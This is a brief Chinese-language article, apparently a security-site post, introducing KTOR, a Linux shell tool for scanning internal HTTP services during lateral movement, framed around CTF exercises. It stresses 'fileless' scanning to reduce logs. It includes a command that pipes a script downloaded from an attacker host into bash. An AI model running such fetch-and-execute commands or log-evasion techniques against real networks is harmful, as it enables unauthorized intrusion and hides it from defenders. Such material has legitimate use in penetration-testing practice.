简介

KTOR 是一款专为 Linux 横向渗透设计的工具。通过该工具,您可以快速扫描内部 HTTP 服务,以便进一步进行网络渗透,且实现无文件落地扫描。

在CTF中通常需要利用本地其他端口HTTP服务或其他主机的HTTP服务来横向移动权限提升。

在获取靶机低权限后通常需要对内部网络进一步探测,而且通过端口转发后再扫描过于耗费时间,为了解决这一缺陷,KTOR来预先探测存在HTTP服务的机器,利用curl命令实现无文件落地扫描,减少日志产生。

使用方法

$ ./ktor.sh -h

1739203975_67aa25874045c060c0ddf.png

扫描本地主机HTTP服务

$ curl http://10.10.16.28/ktor.sh|bash -s -- -l -p all

1739203980_67aa258c552299a8fb3b4.png

指定网卡扫描内网HTTP服务

1739203984_67aa2590537c8de63b5cb.png

本文版权归漏洞盒子所有
黑客 内网渗透 web安全 CTF